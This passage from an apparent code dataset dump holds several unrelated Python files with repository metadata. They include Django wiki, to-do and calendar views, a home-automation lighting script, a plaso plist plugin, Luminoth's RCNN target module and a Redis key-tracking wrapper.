ans_list:\n\tprint(i)\n\tprint('\\n\\n')\n\n\n","repo_name":"puneetmanghwani/stackoverflow","sub_path":"search_get_ans.py","file_name":"search_get_ans.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21119478525","text":"from django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\nfrom django import forms\n\nfrom . 
import util\n\nimport markdown2\nimport random\n\nclass NewEntryForm(forms.Form):\n title = forms.CharField(label=\"Title\", widget=forms.TextInput(attrs={'class': 'form-control col-md-10 col-lg-10'}))\n content = forms.CharField(label=\"\",widget=forms.Textarea(attrs={'class': 'form-control col-md-10 col-lg-10', 'rows': 12}))\n edit = forms.BooleanField(initial=False, widget=forms.HiddenInput(), required=False)\n\ndef createEntry(request):\n if request.method != \"POST\":\n return render(request,\"encyclopedia/new_entry.html\", {\"form\": NewEntryForm()})\n else:\n form = NewEntryForm(request.POST)\n\n if form.is_valid():\n title = form.cleaned_data[\"title\"]\n content = form.cleaned_data[\"content\"]\n\n if(util.get_entry(title) is None or form.cleaned_data[\"edit\"] is True):\n util.save_entry(title,content)\n return HttpResponseRedirect(reverse(\"entry\", kwargs={'title': title}))\n else:\n return render(request, \"encyclopedia/new_entry.html\", {\n \"form\": form,\n \"existing\": True,\n \"entry\": title\n })\n else:\n return render(request, \"encyclopedia/new_entry.html\", {\"form\": form})\n\ndef editEntry(request, title):\n entry = util.get_entry(title)\n \n if entry is None:\n return render(request, \"encyclopedia/missing_entry.html\", {\n \"title\": title \n })\n else:\n form = NewEntryForm()\n form.fields[\"title\"].initial = title\n form.fields[\"content\"].initial = entry\n form.fields[\"edit\"].initial = True\n\n return render(request, \"encyclopedia/new_entry.html\", {\n \"form\": form,\n \"title\": title,\n \"edit\": form.fields[\"edit\"].initial\n })\n\ndef entry(request, title):\n entry = util.get_entry(title)\n \n if entry != None:\n return render(request, \"encyclopedia/entry.html\", {\n \"entry\": markdown2.markdown(entry), \"title\": title\n })\n else:\n return render(request, \"encyclopedia/missing_entry.html\", {\n \"title\": title\n })\n\ndef index(request):\n return render(request, \"encyclopedia/index.html\", {\n \"entries\": util.list_entries()\n })\n\ndef randomEntry(request):\n entries = util.list_entries()\n randomEntry = random.choice(entries)\n\n return HttpResponseRedirect(reverse(\"entry\", kwargs={'title': randomEntry}))\n\ndef search(request):\n searched_entry = request.GET.get('q','')\n\n if(util.get_entry(searched_entry) is not None):\n return HttpResponseRedirect(reverse(\"entry\", kwargs={'title': searched_entry }))\n else:\n matchingEntries = []\n\n for entry in util.list_entries():\n if searched_entry.upper() in entry.upper():\n matchingEntries.append(entry)\n\n return render(request, \"encyclopedia/index.html\", {\n \"entries\": matchingEntries, \"searched_entry\": searched_entry\n })","repo_name":"Fractalbuilder/Wiki","sub_path":"encyclopedia/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9456483092","text":"\"\"\"\nMotion sensors to control the stairway lights going up.\n\"\"\"\n\nimport appdaemon.plugins.hass.hassapi as hass\n\nclass MotionClass(hass.Hass):\n\n def initialize(self):\n # Motion sensors.\n\n self.motion_sensors = [\n \"binary_sensor.presence_entrance\", # Entrance Motion Sensor\n \"binary_sensor.presence_top_floor_stairway\" # Top Floor Stairs Motion Sensor\n ]\n\n self.illumination_sensors = [\n \"sensor.lightlevel_top_floor_stairway\" # Top Floor Stairs Motion Illumination Sensor\n ]\n\n for entity in self.motion_sensors:\n self.listen_state(self.motionTrigger,entity)\n\n for entity in 
self.illumination_sensors:\n self.listen_state(self.motionTrigger,entity)\n\n self.listen_state(self.inpuBoolean,\"input_boolean.top_floor_lights_motion_control\")\n\n\n def areWeAwake(self, entity):\n \"\"\" Check whether anyone is awake\"\"\"\n if self.get_state(entity) == \"on\":\n return True\n\n # Returns value of state as integer. Might need to remove the \"float\" is you get errors.\n def getIntegerState(self, entity_id):\n \"\"\" Get integer of illumination state\"\"\"\n try:\n return int(float(self.get_state(entity_id)))\n except ValueError:\n return 0\n\n def motionTrigger(self, entity, attribute, old, new, kwargs):\n \"\"\" Turn on/off lights\"\"\"\n sensor_1_state = self.get_state(\"binary_sensor.presence_entrance\") # Entrance Motion\n sensor_2_state = self.get_state(\"binary_sensor.presence_top_floor_stairway\") # Top Floor Stairs Motion Sensor\n\n awake = self.areWeAwake(\"light.living_room_lights\")\n party_mode = self.get_state('input_boolean.party_mode') == 'on'\n workday = self.get_state('sensor.workday_actual') == 'on'\n workday_tomorrow= self.get_state('sensor.workday_actual', attribute='workday_tomorrow') == 'on'\n\n # if party_mode:\n # if new == 'on':\n # self.turn_on(\"light.stairway_up\",brightness=255,kelvin=2700)\n # else:\n # self.turn_off(\"light.stairway_up\")\n\n if entity == \"binary_sensor.presence_entrance\" and new == 'on':\n # if sensor_2_state == 'off':\n if party_mode:\n self.turn_on(\"light.stairway_up\",brightness=255,kelvin=2700)\n elif self.now_is_between('07:00:00', '09:00:00'):\n if workday:\n self.turn_on(\"light.stairway_up\",brightness=255,kelvin=2700)\n elif self.now_is_between('09:00:00', '22:00:00'):\n self.turn_on(\"light.stairway_up\",brightness=255,kelvin=2700)\n elif self.now_is_between('22:00:00', '07:00:00'):\n if awake:\n self.turn_on(\"light.stairway_up\",brightness=255,kelvin=2700)\n # else:\n # self.turn_on(\"light.stairway_up\",brightness=10,kelvin=2200)\n\n\n elif entity == \"binary_sensor.presence_top_floor_stairway\" and new == 'on':\n if party_mode:\n self.turn_on(\"light.stairway_up\",brightness=255,kelvin=2700)\n if sensor_1_state == 'off':\n if self.now_is_between('07:00:00', '22:00:00'):\n if self.getIntegerState(\"sensor.lightlevel_top_floor_stairway\") < 50:\n self.turn_on(\"light.stairway_up\",brightness=255,kelvin=2700)\n\n elif self.now_is_between('22:00:00', '07:00:00'):\n if awake:\n self.turn_on(\"light.stairway_up\",brightness=255,kelvin=2700)\n else:\n self.turn_on(\"light.stairway_up\",brightness=50,kelvin=2200)\n\n elif sensor_1_state == 'on' and sensor_2_state == 'on': # in the off chance that one motion sensor triggers, and the next is turned on before the check is performed.\n self.turn_on(\"light.stairway_up\",brightness=255,kelvin=2700)\n\n elif sensor_1_state == 'off' and sensor_2_state == 'off':\n self.turn_off(\"light.stairway_up\")\n\n def inpuBoolean(self, entity, attribute, old, new, kwargs):\n\n if new == \"on\":\n self.motionTrigger(entity, attribute, old, new, kwargs)\n","repo_name":"Aephir/HomeAssistantConfig","sub_path":"appdaemon/apps/motion/stairway_up_lights.py","file_name":"stairway_up_lights.py","file_ext":"py","file_size_in_byte":4221,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"6144958768","text":"from django.shortcuts import render, redirect\nfrom django.contrib.sites.shortcuts import get_current_site\nimport datetime\nfrom calendar import Calendar\n\n\ndef index(request):\n current_date = datetime.datetime.now()\n 
current_weekday = datetime.datetime.now().weekday()\n month_iter = Calendar(6).itermonthdates(current_date.year, current_date.month)\n day_before = []\n day_month = []\n day_after = []\n for day in month_iter:\n if day.year < current_date.year or (day.year == current_date.year and day.month < current_date.month):\n day_before.append(day.day)\n elif day.year > current_date.year or (day.year == current_date.year and day.month > current_date.month):\n day_after.append(day.day)\n else:\n day_month.append(day.day)\n return render(request, 'basic/index.html', context={\n 'current_date': current_date,\n 'current_weekday': current_weekday,\n 'day_before': day_before,\n 'day_month': day_month,\n 'day_after': day_after\n })\n\n\ndef about(request):\n return render(request, 'basic/about.html', context={})\n\n\ndef android_browser(request): \n return redirect('https://www.jianyang995.com/projects/project/P3');","repo_name":"yangjufo/Personal-Website","sub_path":"mysite/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"26802092845","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Dec 25 11:28:46 2018\r\n\r\n@author: badat\r\n\"\"\"\r\n\r\nprint('Correct Version')\r\n\r\ndescription = 'using GloVe w2v\\n'\r\ndescription += '-'*30 +'\\n'\r\ndescription += 'VGG'+'\\n'\r\ndescription += '-'*30 +'\\n'\r\nprint(description)\r\n\r\ndim_feature=[14*14,512]\r\nbatch_size=32\r\n\r\ndocker_path = './'\r\nNFS_path = docker_path\r\n\r\n\r\ndim_feature=[14*14,512]\r\nn_epoches = 2\r\nn_train_sample = 5501586\r\n\r\ntrain_img_path = NFS_path+'TFRecords/train_feature_2018_04_ZLIB.tfrecords'\r\nval_img_path = NFS_path+'TFRecords/validation_feature_2018_04_ZLIB.tfrecords'\r\ntest_img_path = NFS_path+'TFRecords/OI_seen_unseen_test_feature_2018_04_ZLIB.tfrecords'\r\n\r\n############# n_iters #############\r\nn_iters = (n_train_sample//batch_size)\r\nif n_train_sample%batch_size != 0:\r\n n_iters += 1\r\nn_iters *= n_epoches\r\n############# n_iters #############\r\ninit_w2v = NFS_path+'wiki_contexts/OpenImage_w2v_context_window_10_glove-wiki-gigaword-300.pkl'\r\nn_report = 150\r\n############# learning_rate #############\r\nlearning_rate_phase_1 = 0.01\r\nlearning_rate_phase_2 = 0.001\r\n\r\n\r\n#################### NUS_WIDE ####################\r\nNUS_WIDE_train_img_path = NFS_path+'TFRecords/NUS_WIDE_Train_full_feature_ZLIB.tfrecords'\r\nNUS_WIDE_val_img_path = NFS_path+'TFRecords/NUS_WIDE_Train_full_feature_ZLIB.tfrecords'\r\nNUS_WIDE_test_img_path = NFS_path+'TFRecords/NUS_WIDE_Test_full_feature_ZLIB.tfrecords'\r\n\r\nNUS_WIDE_n_train_sample = 80000\r\nNUS_WIDE_init_w2v = NFS_path+'wiki_contexts/NUS_WIDE_pretrained_w2v_glove-wiki-gigaword-300'\r\nNUS_WIDE_n_iters = 80000//batch_size*40\r\nNUS_WIDE_zs_n_iters = 80000//batch_size*80\r\nNUS_WIDE_signal_str = 0.3","repo_name":"hbdat/cvpr20_LESA","sub_path":"global_setting.py","file_name":"global_setting.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"32"} +{"seq_id":"20415868574","text":"import pandas as pd\r\nimport os\r\n\r\n\r\nlink = pd.read_csv('assets/links.csv')\r\nnode = pd.read_csv('assets/nodes.csv')\r\ntraffic = pd.read_csv('assets/data2013_1st_week.csv')\r\nlong_island_solar = pd.read_csv('assets/long-island_2013_january_week1.csv')\r\nbrentwood_solar = pd.read_csv('assets/brentwood_2013_Jan_week1.csv')\r\nmedian_serial = 
{}\r\nnode_to_median = {}\r\nmedians: any\r\n\r\nlatlongs = []\r\n\r\ndef populateLatLong(number_of_medians):\r\n print(\"Populate lat longs......\")\r\n global latlongs, node_to_median\r\n\r\n for index in range(number_of_medians):\r\n dir_name = 'assets/'\r\n temp = pd.read_csv(os.path.join(dir_name, 'latlongs' + str(index+1) + '.csv'))\r\n latlongs.append(temp)\r\n latlongs[index].columns = ['sl.', 'node_id', 'xcoord', 'ycoord']\r\n\r\n for i, row in latlongs[index].iterrows():\r\n node_to_median[row.node_id] = index\r\n \r\n\r\ndef updateMedians():\r\n print(\"Update medians......\")\r\n global medians, median_serial\r\n\r\n medians = pd.read_csv('assets/medians.csv')\r\n medians.columns = ['sl.', 'node_id', 'xcoord', 'ycoord']\r\n \r\n for index, row in medians.iterrows():\r\n median_serial[row.node_id] = index","repo_name":"ahnaf2556/distribute-battery-electric-vehicle","sub_path":"source/simulateOrder/populateData.py","file_name":"populateData.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"862473779","text":"# only two types of loops\n# for and while\nx = [{\"id\": 1, \"name\": \"raj\"}, {\"id\": 2, \"name\": \"rajender\"},\n {\"id\": 3, \"name\": \"rajenderDandyal\"}]\n\nfor item in x:\n print(item[\"id\"])\n print(item[\"name\"])\n\n# break and continue\nfor item in x:\n if item[\"name\"] == \"rajender\":\n continue\n print(item[\"name\"])\n\nfor item in x:\n if item[\"id\"] == 2:\n break\n print(item[\"id\"])\n\n# for else\n# look for name starting with J\n# if found print Found else Not Found\nfound = False\nfor items in x:\n if item[\"name\"].startswith('J'):\n found = True\n break\n\nmessage = \"Found\" if found else \"Not found\"\nprint(message)\n\n# with for else\n# else block executes if the for loop executes successfully\n# without using the break statement\nmessage = None\nfor item in x:\n if item['name'].startswith('J'):\n message = \"Found\"\n break\nelse:\n message = \"Not found\"\nprint(message)\n\n# range\nz = 0\nfor z in range(0, 10, 1):\n print(z)\n\n\n# while loop\ny = 0\nwhile y <= 10:\n print(y)\n y = y+1\n\n# while with else\n# else block will execute even if while loop dosent\nwhile 10 < y < 15:\n print('i am y')\n y = y+1\nelse:\n print('i am y in else')\n","repo_name":"RajenderDandyal/easy-python","sub_path":"loops.py","file_name":"loops.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17029583601","text":"from plaso.events import plist_event\nfrom plaso.parsers import plist\nfrom plaso.parsers.plist_plugins import interface\n\n\n__author__ = 'Joaquin Moreno Garijo (Joaquin.MorenoGarijo.2013@live.rhul.ac.uk)'\n\n\nclass SpotlightPlugin(interface.PlistPlugin):\n \"\"\"Basic plugin to extract Spotlight.\"\"\"\n\n NAME = 'plist_spotlight'\n DESCRIPTION = u'Parser for Spotlight plist files.'\n\n PLIST_PATH = 'com.apple.spotlight.plist'\n PLIST_KEYS = frozenset(['UserShortcuts'])\n\n # Generated events:\n # name of the item: searched term.\n # PATH: path of the program associated to the term.\n # LAST_USED: last time when it was executed.\n # DISPLAY_NAME: the display name of the program associated.\n\n def GetEntries(self, parser_context, match=None, **unused_kwargs):\n \"\"\"Extracts relevant Spotlight entries.\n\n Args:\n parser_context: A parser context object (instance of ParserContext).\n match: Optional dictionary containing keys extracted from 
PLIST_KEYS.\n The default is None.\n \"\"\"\n for search_text, data in match['UserShortcuts'].iteritems():\n description = (\n u'Spotlight term searched \"{0:s}\" associate to {1:s} '\n u'({2:s})').format(search_text, data['DISPLAY_NAME'], data['PATH'])\n event_object = plist_event.PlistEvent(\n u'/UserShortcuts', search_text, data['LAST_USED'], description)\n parser_context.ProduceEvent(event_object, plugin_name=self.NAME)\n\n\nplist.PlistParser.RegisterPlugin(SpotlightPlugin)\n","repo_name":"cvandeplas/plaso","sub_path":"plaso/parsers/plist_plugins/spotlight.py","file_name":"spotlight.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"40813135387","text":"from poplib import POP3_SSL_PORT\nfrom django.shortcuts import render\n\n\nposts = [\n {\n 'authors':'Inno',\n 'title':'Insta Post',\n 'content':'First post content',\n 'date_posted':'August 27,2021'\n\n },\n {\n 'authors':'Jane',\n 'title':'Insta Post 2',\n 'content':'Second post content',\n 'date_posted':'August 29,2021'\n\n }\n]\n\ndef home(request):\n context = {\n 'posts': posts\n }\n return render(request,'insta/home.html', context)\n\ndef about(request):\n return render(request,'insta/about.html')","repo_name":"Cencious/django_django","sub_path":"insta/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"21119225750","text":"from itertools import combinations\nn = int(input())\n\n# 모든 감소하는 수\nresult = list()\n# 1~10개의 조합 만들기, 10자리수가 마지막 수임\nfor i in range(1, 11):\n for comb in combinations(range(10), i): # 0~9로 하나씩 조합 만들기\n comb = list(comb)\n comb.sort(reverse=True) # 해당 조합을 감소하는 수로 변경\n result.append(int(\"\".join(list(map(str, comb)))))\n\n# 오름차순 정렬\nresult.sort()\n\nif n >= len(result):\n print(-1)\n\n# 인덱스가 넘어 가는 경우 -1 출력. 마지막 수 9876543210\nelse:\n print(result[n])","repo_name":"GyuJeGal/Algorithm-Study","sub_path":"BaekJoon/Problem1038.py","file_name":"Problem1038.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"21756518940","text":"import tensorflow as tf\nimport sonnet as snt\n\nfrom luminoth.utils.bbox_transform_tf import encode\nfrom luminoth.utils.bbox_overlap import bbox_overlap_tf\n\n\nclass RCNNTarget(snt.AbstractModule):\n \"\"\"Generate RCNN target tensors for both probabilities and bounding boxes.\n\n Targets for RCNN are based upon the results of the RPN, this can get tricky\n in the sense that RPN results might not be the best and it might not be\n possible to have the ideal amount of targets for all the available ground\n truth boxes.\n\n There are two types of targets, class targets and bounding box targets.\n\n Class targets are used both for background and foreground, while bounding\n box targets are only used for foreground (since it's not possible to create\n a bounding box of \"background objects\").\n\n A minibatch size determines how many targets are going to be generated and\n how many are going to be ignored. 
RCNNTarget is responsible for choosing\n which proposals and corresponding targets are included in the minibatch and\n which ones are completely ignored.\n \"\"\"\n def __init__(self, num_classes, config, seed=None, variances=None,\n name='rcnn_proposal'):\n \"\"\"\n Args:\n num_classes: Number of possible classes.\n config: Configuration object for RCNNTarget.\n \"\"\"\n super(RCNNTarget, self).__init__(name=name)\n self._num_classes = num_classes\n self._variances = variances\n # Ratio of foreground vs background for the minibatch.\n self._foreground_fraction = config.foreground_fraction\n self._minibatch_size = config.minibatch_size\n # IoU lower threshold with a ground truth box to be considered that\n # specific class.\n self._foreground_threshold = config.foreground_threshold\n # High and low treshold to be considered background.\n self._background_threshold_high = config.background_threshold_high\n self._background_threshold_low = config.background_threshold_low\n self._seed = seed\n\n def _build(self, proposals, gt_boxes):\n \"\"\"\n Args:\n proposals: A Tensor with the RPN bounding boxes proposals.\n The shape of the Tensor is (num_proposals, 4).\n gt_boxes: A Tensor with the ground truth boxes for the image.\n The shape of the Tensor is (num_gt, 5), having the truth label\n as the last value for each box.\n Returns:\n proposals_label: Either a truth value of the proposals (a value\n between 0 and num_classes, with 0 being background), or -1 when\n the proposal is to be ignored in the minibatch.\n The shape of the Tensor is (num_proposals, 1).\n bbox_targets: A bounding box regression target for each of the\n proposals that have and greater than zero label. For every\n other proposal we return zeros.\n The shape of the Tensor is (num_proposals, 4).\n \"\"\"\n overlaps = bbox_overlap_tf(proposals, gt_boxes[:, :4])\n # overlaps now contains (num_proposals, num_gt_boxes) with the IoU of\n # proposal P and ground truth box G in overlaps[P, G]\n\n # We are going to label each proposal based on the IoU with\n # `gt_boxes`. 
Start by filling the labels with -1, marking them as\n # ignored.\n proposals_label_shape = tf.gather(tf.shape(proposals), [0])\n proposals_label = tf.fill(\n dims=proposals_label_shape,\n value=-1.\n )\n # For each overlap there is three possible outcomes for labelling:\n # if max(iou) < config.background_threshold_low then we ignore.\n # elif max(iou) <= config.background_threshold_high then we label\n # background.\n # elif max(iou) > config.foreground_threshold then we label with\n # the highest IoU in overlap.\n #\n # max_overlaps gets, for each proposal, the index in which we can\n # find the gt_box with which it has the highest overlap.\n max_overlaps = tf.reduce_max(overlaps, axis=1)\n\n iou_is_high_enough_for_bg = tf.greater_equal(\n max_overlaps, self._background_threshold_low\n )\n iou_is_not_too_high_for_bg = tf.less(\n max_overlaps, self._background_threshold_high\n )\n bg_condition = tf.logical_and(\n iou_is_high_enough_for_bg, iou_is_not_too_high_for_bg\n )\n proposals_label = tf.where(\n condition=bg_condition,\n x=tf.zeros_like(proposals_label, dtype=tf.float32),\n y=proposals_label\n )\n\n # Get the index of the best gt_box for each proposal.\n overlaps_best_gt_idxs = tf.argmax(overlaps, axis=1)\n # Having the index of the gt bbox with the best label we need to get\n # the label for each gt box and sum it one because 0 is used for\n # background.\n best_fg_labels_for_proposals = tf.add(\n tf.gather(gt_boxes[:, 4], overlaps_best_gt_idxs),\n 1.\n )\n iou_is_fg = tf.greater_equal(\n max_overlaps, self._foreground_threshold\n )\n best_proposals_idxs = tf.argmax(overlaps, axis=0)\n\n # Set the indices in best_proposals_idxs to True, and the rest to\n # false.\n # tf.sparse_to_dense is used because we know the set of indices which\n # we want to set to True, and we know the rest of the indices\n # should be set to False. That's exactly the use case of\n # tf.sparse_to_dense.\n is_best_box = tf.sparse_to_dense(\n sparse_indices=tf.reshape(best_proposals_idxs, [-1]),\n sparse_values=True, default_value=False,\n output_shape=tf.cast(proposals_label_shape, tf.int64),\n validate_indices=False\n )\n # We update proposals_label with the value in\n # best_fg_labels_for_proposals only when the box is foreground.\n proposals_label = tf.where(\n condition=iou_is_fg,\n x=best_fg_labels_for_proposals,\n y=proposals_label\n )\n # Now we need to find the proposals that are the best for each of the\n # gt_boxes. 
We overwrite the previous proposals_label with this\n # because setting the best proposal for each gt_box has priority.\n best_proposals_gt_labels = tf.sparse_to_dense(\n sparse_indices=tf.reshape(best_proposals_idxs, [-1]),\n sparse_values=gt_boxes[:, 4] + 1,\n default_value=0.,\n output_shape=tf.cast(proposals_label_shape, tf.int64),\n validate_indices=False,\n name=\"get_right_labels_for_bestboxes\"\n )\n proposals_label = tf.where(\n condition=is_best_box,\n x=best_proposals_gt_labels,\n y=proposals_label,\n name=\"update_labels_for_bestbox_proposals\"\n )\n\n # proposals_label now has a value in [0, num_classes + 1] for\n # proposals we are going to use and -1 for the ones we should ignore.\n # But we still need to make sure we don't have a number of proposals\n # higher than minibatch_size * foreground_fraction.\n max_fg = int(self._foreground_fraction * self._minibatch_size)\n fg_condition = tf.logical_or(\n iou_is_fg, is_best_box\n )\n fg_inds = tf.where(\n condition=fg_condition\n )\n\n def disable_some_fgs():\n # We want to delete a randomly-selected subset of fg_inds of\n # size `fg_inds.shape[0] - max_fg`.\n # We shuffle along the dimension 0 and then we get the first\n # num_fg_inds - max_fg indices and we disable them.\n shuffled_inds = tf.random_shuffle(fg_inds, seed=self._seed)\n disable_place = (tf.shape(fg_inds)[0] - max_fg)\n # This function should never run if num_fg_inds <= max_fg, so we\n # add an assertion to catch the wrong behaviour if it happens.\n integrity_assertion = tf.assert_positive(\n disable_place,\n message=\"disable_place in disable_some_fgs is negative.\"\n )\n with tf.control_dependencies([integrity_assertion]):\n disable_inds = shuffled_inds[:disable_place]\n is_disabled = tf.sparse_to_dense(\n sparse_indices=disable_inds,\n sparse_values=True, default_value=False,\n output_shape=tf.cast(proposals_label_shape, tf.int64),\n # We are shuffling the indices, so they may not be ordered.\n validate_indices=False\n )\n return tf.where(\n condition=is_disabled,\n # We set it to -label for debugging purposes.\n x=tf.negative(proposals_label),\n y=proposals_label\n )\n # Disable some fgs if we have too many foregrounds.\n proposals_label = tf.cond(\n tf.greater(tf.shape(fg_inds)[0], max_fg),\n true_fn=disable_some_fgs,\n false_fn=lambda: proposals_label\n )\n\n total_fg_in_batch = tf.shape(\n tf.where(\n condition=tf.greater(proposals_label, 0)\n )\n )[0]\n\n # Now we want to do the same for backgrounds.\n # We calculate up to how many backgrounds we desire based on the\n # final number of foregrounds and the total desired batch size.\n max_bg = self._minibatch_size - total_fg_in_batch\n\n # We can't use bg_condition because some of the proposals that satisfy\n # the IoU conditions to be background may have been labeled as\n # foreground due to them being the best proposal for a certain gt_box.\n bg_mask = tf.equal(proposals_label, 0)\n bg_inds = tf.where(\n condition=bg_mask,\n )\n\n def disable_some_bgs():\n # Mutatis mutandis, all comments from disable_some_fgs apply.\n shuffled_inds = tf.random_shuffle(bg_inds, seed=self._seed)\n disable_place = (tf.shape(bg_inds)[0] - max_bg)\n integrity_assertion = tf.assert_non_negative(\n disable_place,\n message=\"disable_place in disable_some_bgs is negative.\"\n )\n with tf.control_dependencies([integrity_assertion]):\n disable_inds = shuffled_inds[:disable_place]\n is_disabled = tf.sparse_to_dense(\n sparse_indices=disable_inds,\n sparse_values=True, default_value=False,\n output_shape=tf.cast(proposals_label_shape, 
tf.int64),\n validate_indices=False\n )\n return tf.where(\n condition=is_disabled,\n x=tf.fill(\n dims=proposals_label_shape,\n value=-1.\n ),\n y=proposals_label\n )\n\n proposals_label = tf.cond(\n tf.greater_equal(tf.shape(bg_inds)[0], max_bg),\n true_fn=disable_some_bgs,\n false_fn=lambda: proposals_label\n )\n\n \"\"\"\n Next step is to calculate the proper targets for the proposals labeled\n based on the values of the ground-truth boxes.\n We have to use only the proposals labeled >= 1, each matching with\n the proper gt_boxes\n \"\"\"\n\n # Get the ids of the proposals that matter for bbox_target comparisson.\n is_proposal_with_target = tf.greater(\n proposals_label, 0\n )\n proposals_with_target_idx = tf.where(\n condition=is_proposal_with_target\n )\n # Get the corresponding ground truth box only for the proposals with\n # target.\n gt_boxes_idxs = tf.gather(\n overlaps_best_gt_idxs,\n proposals_with_target_idx\n )\n # Get the values of the ground truth boxes.\n proposals_gt_boxes = tf.gather_nd(\n gt_boxes[:, :4], gt_boxes_idxs\n )\n # We create the same array but with the proposals\n proposals_with_target = tf.gather_nd(\n proposals,\n proposals_with_target_idx\n )\n # We create our targets with bbox_transform.\n bbox_targets_nonzero = encode(\n proposals_with_target,\n proposals_gt_boxes,\n variances=self._variances,\n )\n\n # We unmap targets to proposal_labels (containing the length of\n # proposals)\n bbox_targets = tf.scatter_nd(\n indices=proposals_with_target_idx,\n updates=bbox_targets_nonzero,\n shape=tf.cast(tf.shape(proposals), tf.int64)\n )\n\n proposals_label = proposals_label\n bbox_targets = bbox_targets\n\n return proposals_label, bbox_targets\n","repo_name":"tryolabs/luminoth","sub_path":"luminoth/models/fasterrcnn/rcnn_target.py","file_name":"rcnn_target.py","file_ext":"py","file_size_in_byte":12823,"program_lang":"python","lang":"en","doc_type":"code","stars":2397,"dataset":"github-code","pt":"32"} +{"seq_id":"11622656875","text":"\"\"\"\nModule with the aim to train fire CLI library for python\n\nThis is lot a fun :)))\n\"\"\"\n\nimport fire\n\nvictor_dict = {\n \"name\": \"Victor Pereira\",\n \"hobbies\": [\"Programar\", \"assistir harry potter\", \"dormir\"],\n \"age\": 21,\n \"Father\": \"Marcelo Junior\",\n \"Mother\": \"Aparecida Barbosa\"\n}\n\n\ndef say_hello(name: str=\"Baby\") -> str:\n \"\"\"\n A function that says hello given a name,\n if a name hasn't provided you will be called \n as \"Baby\" :)\n \"\"\"\n\n return f\"Hello {name}\"\n\n\nfire.Fire()","repo_name":"Lnvictor/soccer-fire","sub_path":"fire_example.py","file_name":"fire_example.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71003208410","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('todo/addTask', views.addTask, name='addTask'),\n path('todo/markDone//', views.markDone, name='markDone'),\n path('todo/deleteTask//', views.deleteTask, name='deleteTask'),\n path('todo/markUndone//', views.markUndone, name='markUndone'),\n path('todo/editTask//', views.editTask, name='editTask'),\n]","repo_name":"arunkumar02042002/todo_app_django","sub_path":"todos/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36733024088","text":"contact_list = [{\"name\":'Ratnavalli', \"number\":913, \"email\":\"ratna@gmail.com\"},{\"name\":\"Pavan\", \"number\":9134983477, \"email\":\"pavan@gmail.com\"},{\"name\":\"Surya\",\"number\":816,\"email\":\"surya@gmail.com\"}]\nnm = input(\"Enter name to get contact: \")\nfor i in contact_list:\n if nm in i.values():\n print(i)\nnum = int(input(\"Enter number to get contact details: \"))\nfor j in contact_list:\n if num in j.values():\n print(j)\nnme = input(\"Enter name to get contact details and edit number: \")\nfor k in contact_list:\n if nme in k.values():\n print(k)\n newnum = int(input(\"Enter number to edit the details of Person: \"))\n k[\"number\"] = newnum\n print(k)","repo_name":"ratnavalli24/Python-Lab","sub_path":"Assignment 2/Source/name.py","file_name":"name.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30894922288","text":"import logging\nimport time\nimport typing\nfrom datetime import timedelta\n\nfrom django_redis.client import DefaultClient\n\nif typing.TYPE_CHECKING:\n from redis.client import StrictRedis\n\nlogger = logging.getLogger(__name__)\n\n\nclass TwemRedis:\n KEYS = \"twem::cache::keys::set\"\n forever = float(\"+inf\")\n insert_key_commands = (\n \"hset\",\n \"zadd\",\n \"sadd\",\n \"lpush\",\n \"lpushx\",\n \"rpush\",\n \"rpushx\",\n \"lset\",\n \"linsert\",\n \"getset\",\n \"incrby\",\n \"incr\",\n \"incrbyfloat\",\n \"setnx\",\n )\n\n insert_mapping_commands = (\n \"mset\",\n \"msetnx\",\n )\n\n insert_ex_key_commands = (\n \"psetex\",\n \"setex\",\n )\n\n def __init__(self, client: 'StrictRedis'):\n self._client = client\n\n for m in self.insert_key_commands:\n setattr(self, m, self._execute_insert(getattr(client, m)))\n\n for m in self.insert_mapping_commands:\n setattr(self, m, self._execute_insert_mapping(getattr(client, m)))\n\n for m in self.insert_ex_key_commands:\n setattr(self, m, self._execute_insert_ex(getattr(client, m)))\n\n def __getattr__(self, item):\n return getattr(self._client, item)\n\n def _execute_insert(self, fn):\n def wrapper(name, *args, **options):\n result = fn(name, *args, **options)\n if result:\n self._add_keys(name)\n return result\n\n return wrapper\n\n def _execute_insert_ex(self, fn):\n def wrapper(name, ex, *args, **options):\n result = fn(name, ex, *args, **options)\n if result:\n self._add_keys(name, ex=ex.total_seconds() if isinstance(ex, timedelta) else ex)\n return result\n\n return wrapper\n\n def _execute_insert_mapping(self, fn):\n def wrapper(mapping, *args, **options):\n result = fn(mapping, *args, **options)\n if result:\n self._add_keys(*mapping.keys())\n return 